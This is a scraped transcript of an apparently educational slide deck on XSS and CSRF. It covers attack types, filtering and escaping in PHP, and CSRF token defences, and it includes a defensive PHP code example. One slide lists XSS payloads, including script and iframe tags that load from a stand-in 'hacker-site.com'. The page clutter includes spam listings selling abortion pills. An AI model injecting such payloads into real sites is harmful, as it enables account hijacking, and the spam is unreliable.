MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...Jittipong Loespradit
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidPhilip Schwarz
 
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxBUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxalwaysnagaraju26
 

Último (20)

LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5   - SESSION 1 2023 (1).pptx - PDF 123456LEVEL 5   - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
ManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide Deck
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
Session7-XSS & CSRF

  • 9. XSS Persistent  The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping.
  • 10. XSS  DOM-Based XSS Vulnerabilities  Both reflected and stored XSS vulnerabilities involve a specific pattern of behavior, in which the application takes user-controllable data and displays this back to users in an unsafe way. A third category of XSS vulnerabilities does not share this characteristic. Here, the process by which the attacker’s  JavaScript gets executed is as follows: o A user requests a crafted URL supplied by the attacker and containing embedded JavaScript. o The server’s response does not contain the attacker’s script in any form. o When the user’s browser processes this response, the script is executed nonetheless.
  • 11. XSS XSS Pattern  There are many slight variations to this XSS attack, however all XSS attacks follow this pattern, which is depicted in the diagram below.
  • 12. XSS  Cross-site Scripting (XSS)  In the pie-chart below, created by the Web Hacking Incident Database for 2011 (WHID)
  • 13. XSS Cross-site Scripting (XSS)  what form does the data come? Tag Code <SCRIPT> <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> <SCRIPT> alert(“XSS”); </SCRIPT> <BODY> <BODY ONLOAD=alert("XSS")> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG> <IMG SRC="javascript:alert('XSS');"> <IFRAME> <IFRAME SRC=”http://hacker-site.com/xss.html”> <INPUT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');“>
  • 14. XSS  Sanitization  Sanitization is type of Approaches to Input Handling .  Sometimes accept data that cannot be guaranteed as safe. Instead of rejecting this input, the application sanitizes it in various ways to prevent it from having any adverse effects.  Potentially malicious characters may be: o removed from the data altogether o leaving only what is known to be safe o suitably encoded or “escaped” before further processing is performed
15. XSS & CSRF
 Introduce XSS attacks
 Strategies for Preventing of XSS
 Introduce CSRF Attacks
 Strategies For Preventing Of CSRF

16. XSS
Preventing XSS Attacks
 Filtering for XSS
 Escaping from XSS

17. XSS
Filtering for XSS
 A filter removes dangerous keywords, such as the infamous <SCRIPT> tag, JavaScript commands, CSS styles and other dangerous HTML markup (such as markup that contains event handlers).
 Many web developers choose to implement their own filtering mechanisms; they usually write server-side code (a black list).
 Hackers usually have more experience than the web developers, and often manage to circumvent simple filters by using techniques such as hex encoding, unicode character variations, line breaks and null characters in strings.
 It is recommended to use some sort of library that has been tried and tested by the community at large.

18. XSS
Filtering for XSS
 PHP boasts a more comprehensive library called HTML Purifier, which is licensed as open source and can be customised depending on your needs. HTML Purifier also boasts strict standards compliance and better features than other filters.
 Another interesting library you can use is HTML Markdown, which converts text from your users into standard and clean XHTML. This gives the advantage that minimal HTML markup can exist in your user's input (such as bold, underline and colours). HTML Markdown is a Perl library and does not explicitly advertise XSS prevention features, so it probably should not be your only line of defence.

19. XSS
Filtering for XSS
 PHP Functions:
o filter_var()
o strip_tags()
o htmlentities()

20. XSS
Escaping from XSS
 This is the primary means to disable an XSS attack. When performing escaping you are effectively telling the browser that the data you are sending should be treated as data and should not be interpreted in any other way.
 Escaping has been used to construct this article. I have managed to bring many scripts into your browser, but none of these scripts has executed! The technique used to do that is called escaping, or as the W3C calls it, “Character Escaping”.
 In HTML you can escape dangerous characters by using the &# sequence followed by its character code.
 An escaped < character looks like this: &#60. The > character is escaped like this: &#62.

21. XSS
Sanitization
 Example
o For example, the usual defense against cross-site scripting attacks is to HTML-encode dangerous characters before these are embedded into pages of the application:
char | code
" | &quot;
' | &apos;
& | &amp;
< | &lt;
> | &gt;

22. XSS
Escaping from XSS
 PHP Functions:
o htmlspecialchars()
23. XSS & CSRF
 Introduce XSS attacks
 Strategies for Preventing of XSS
 Introduce CSRF Attacks
 Strategies For Preventing Of CSRF

24. CSRF
Introduction
 Cross-Site Request Forgery, or CSRF for short, is a common and regular online attack. CSRF also goes by the acronym XSRF and the phrase Sea-Surf.
 CSRF attacks involve a malicious exploit of a website in which a user transmits malicious requests that the target website trusts, without the user’s consent.
 In Cross-Site Scripting (XSS), the attacker exploits the trust a user has for a website; with CSRF, on the other hand, the attacker exploits the trust a website has in a user’s browser.

25. CSRF
Introduction
1. You visit 'good site' A, where you log in and get a cookie to identify your session.
2. You leave site A, but forget to close your open session.
3. You visit 'bad site' B, where there is a malicious GET request hidden as an IMG.
4. Now, you are inadvertently executing an action on site A, using the credentials from the cookie generated when you visited site A.

27. XSS & CSRF
 Introduce XSS attacks
 Strategies for Preventing of XSS
 Introduce CSRF Attacks
 Strategies For Preventing Of CSRF

28. CSRF
Prevention Measures That Do NOT Work
 Using a Secret Cookie
 Only Accepting POST Requests
 Multi-Step Transactions
 URL Rewriting

29. CSRF
Prevention Measure: Token Pattern
 A prevention measure could be the implementation and inclusion of tokens in a user’s (current) session.
 Tokens are long cryptographic values that are difficult to guess. These will be generated when a user’s session begins and will be associated with this particular user’s session.
 This challenge token will be included in each request, and will be used by the server side to verify the legitimacy of the end-user’s request.

30. CSRF
More Recommendations:
 Synchronizer Token Pattern
 Checking The Referer Header
 Challenge-Response
o CAPTCHA
o Re-Authentication (password)
 Client/User Prevention
o Log off immediately after using a Web application
o Do not allow your browser to save usernames/passwords
o Do not use the same browser to access sensitive applications and to surf the Internet freely (tabbed browsing)
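The token pattern of slide 29 together with the Referer/Origin check of slide 30, applied to a library "renew book" form. This is an added example, not code from the slides; the host name library.example, the file name renew.php and the book id are assumptions. random_bytes() and hash_equals() are standard PHP 7+ functions.

```php
<?php
// Added example (not from the slides): synchronizer token pattern plus
// an Origin/Referer check for a "renew book" form. The host name and
// renew.php are assumptions made for the example.
declare(strict_types=1);
session_start();

const EXPECTED_HOST = 'library.example';   // assumed site host

// Issue one unguessable token per session and keep it server-side.
function csrfToken(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 256 random bits
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session copy. hash_equals()
// runs in constant time, so the comparison does not leak the token.
function csrfValid($submitted): bool {
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Secondary check: a form posted from 'bad site' B carries B's origin.
// Privacy settings can strip both headers, so this fails closed and
// complements the token rather than replacing it.
function sameOrigin(string $expectedHost): bool {
    $src = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    return parse_url($src, PHP_URL_HOST) === $expectedHost;
}

if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!csrfValid($_POST['csrf_token'] ?? null) || !sameOrigin(EXPECTED_HOST)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    // ... renew the book for the logged-in user here ...
    exit('Book renewed.');
}

// Render the form with the token as a hidden field; the token is
// escaped with htmlspecialchars() so the XSS defence still applies.
$token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
echo '<form method="post" action="renew.php">'
   . '<input type="hidden" name="csrf_token" value="' . $token . '">'
   . '<input type="hidden" name="book_id" value="42">'
   . '<button type="submit">Renew</button></form>';
```

A request forged from site B cannot read the token out of site A's page or session, so it arrives without it and is rejected; a session cookie alone, as slide 31 notes, is sent by the browser regardless.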
31. CSRF
Vulnerable Patterns for CSRF
 Any application that accepts HTTP requests from an authenticated user without having some control to verify that the HTTP request is unique to the user's session.
 By checking the rendered page we need to see whether any unique identifiers are appended to the links rendered by the application in the user's browser. If there is no unique identifier relating to each HTTP request that ties the request to the user, we are vulnerable. The session ID is not enough, as the session ID will be sent anyway if a user clicks on a rogue link, because the user is already authenticated.